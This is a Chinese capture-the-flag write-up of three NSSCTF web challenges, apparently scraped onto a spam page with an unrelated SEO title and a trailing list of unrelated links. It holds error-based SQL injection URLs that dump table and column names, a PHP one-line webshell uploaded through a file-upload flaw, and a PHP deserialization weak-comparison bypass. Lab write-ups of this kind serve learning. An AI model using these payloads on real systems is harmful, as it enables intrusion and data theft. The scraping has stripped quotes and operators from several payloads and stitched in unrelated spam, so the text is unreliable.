当前位置: 首页 > news >正文

自己做网站 最好的软件下载河南网站建设的公司

news 2026/5/7 1:33:04
自己做网站 最好的软件下载,河南网站建设的公司,湘潭九华网站,深圳装饰公司100排名目录 [SWPUCTF 2021 新生赛]error 1、题目 2、知识点 3、思路 [LitCTF 2023]作业管理系统 1、题目 2、知识点 3、思路 [HUBUCTF 2022 新生赛]checkin 1、题目 2、知识点 3、思路 [SWPUCTF 2021 新生赛]error 1、题目 2、知识点 数据库注入、报错注入 3、思路 首先…目录 [SWPUCTF 2021 新生赛]error 1、题目 2、知识点 3、思路 [LitCTF 2023]作业管理系统 1、题目 2、知识点 3、思路 [HUBUCTF 2022 新生赛]checkin 1、题目 2、知识点 3、思路 [SWPUCTF 2021 新生赛]error 1、题目 2、知识点 数据库注入、报错注入 3、思路 首先输入一个1 输入1 数据库语句报错且报错信息有回显出来加入注释符 正常回显说明当前的闭合方式正确为单引号的闭合使用报错函数extractvalue http://node4.anna.nssctf.cn:28465/index.php?id1 and extractvalue(1,concat(0x7e,database())) -- 得到数据库名为test_db http://node4.anna.nssctf.cn:28465/index.php?id1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schematest_db))) -- 得到两个表test_tb,users http://node4.anna.nssctf.cn:28465/index.php?id1 and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schematest_db and table_nametest_tb))) -- test_tb表的两个字段为id,flag http://node4.anna.nssctf.cn:28465/index.php?id1 and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schematest_db and table_nameusers))) -- users表的三个字段id,username,password http://node4.anna.nssctf.cn:28465/index.php?id1 and extractvalue(1,concat(0x7e,(select group_concat(flag) from test_db.test_tb))) -- 得到flag的前半段这里以为另外一半藏到别的地方其实是没完全显示出来使用函数substring substring() http://node4.anna.nssctf.cn:28465/index.php?id1 and extractvalue(1,concat(0x7e,(select substring(group_concat(flag),32,30) from test_db.test_tb))) -- 合并起来的flagNSSCTF{eed0ee27-1b46-4520-a7b5-71dd9183d446} [LitCTF 2023]作业管理系统 1、题目 2、知识点 文件上传蚁剑连接 3、思路 右键查看源码发现登录名和密码 登录上去 这里有很多功能我们可以上传一句话木马文件 flag.php ?php eval($_POST[cmd]); #一句话木马 ? 这里我们可以知道上传到根目录下 上传成功后使用蚁剑连接 连接成功后在根目录找到flag文件 打开flag文件得到flag 得到flag NSSCTF{d0dc1586-48ed-4661-8b97-02fd17bf0cd4} [HUBUCTF 2022 新生赛]checkin 1、题目 2、知识点 PHP反序列化数组 3、思路 题目给了我们一段代码 $data_unserialize[username]$username$data_unserialize[password]$password 审计代码意思是username和password的值反序列后的值要相同这里使用了弱类型比较 代码中给了两个值先进行序列化后上传看看使用在线网站 PHP 在线工具 | 菜鸟工具 (jyshare.com) ?php $info array(     usernamethis_is_secret,     passwordthis_is_not_known_to_you ); echo  serialize($info); http://node5.anna.nssctf.cn:25489/?infoa:2:{s:8:username;s:14:this_is_secret;s:8:password;s:24:this_is_not_known_to_you;} flag没有出来因为username和password的值更改了我们不知道具体的值是什么 这里我们就要考虑怎么使两个值相同 弱比较中true和非空、非零字符串弱比较都是为true所以我们使两个字段的值都为true ?php $info array(     usernametrue,     passwordtrue ); echo  serialize($info);   将得到的值传给info 得到flag:NSSCTF{5713f43e-708e-458e-a6fc-fd82c254f8d3} 这篇文章就先写到这里啦哪里不懂的或者哪里不足的欢迎批评指正
http://www.hkea.cn/news/14562140/

相关文章:

  • 我被钓鱼网站骗了骗取建设信用卡建设银行会怎么处理钱会还回吗wordpress微博同步
  • 国外做珠宝的网站有哪些公司的 SEO与网站建设
  • 地产网站建设方案wordpress调用多媒体
  • 镇平建设局网站企业网站如何上存
  • 廊坊设计网站公司网站建设去哪里找客户
  • 网站开发的源代码怎么算侵权黄页推广2021
  • 国内炫酷的网站设计请人做个网站多少钱
  • 国外做鞋子的网站吗天津个人做网站
  • 合肥市建设工程合同备案网站生成论坛网站
  • 网站建设与维护 计算机平顶山市网站建设
  • 社区app网站模板下载南宁网站推广优化
  • 中国舆情观察网搜索引擎优化的对比
  • 青岛英文建站公司西安网站价格
  • 天津环保网站建设概念tp5网站开发模板
  • 郑州设计师网广州seo排名
  • 怎么做五合一网站国家开发投资集团
  • 北京永安市政建设投资有限公司网站静态网站需要数据库吗
  • 网站建设拾金手指下拉二十网站开发保障合同
  • 免费网站大全app网站建设与运营公司部门结构
  • 网站建设作业有哪些微信推广文案
  • 哪个网站买域名好宣传片制作软件app
  • h5企业模板网站模板下载天津有哪些互联网公司
  • 最好的做网站公司有哪些大型网站建设完全教程
  • 南京手机网站建站流程网站上线
  • 外贸网站 沙盒无证做音频网站违法吗
  • 扬中网站建设方案网站建设seo虾哥网络
  • 北京网站建设咸宁企业运营实训报告
  • 网易门户网站建设国内php开发的网站建设
  • 河北建设厅官方网站报名考试网旅游公司网页设计
  • 广东圆心网站开发一个空间怎么做多个网站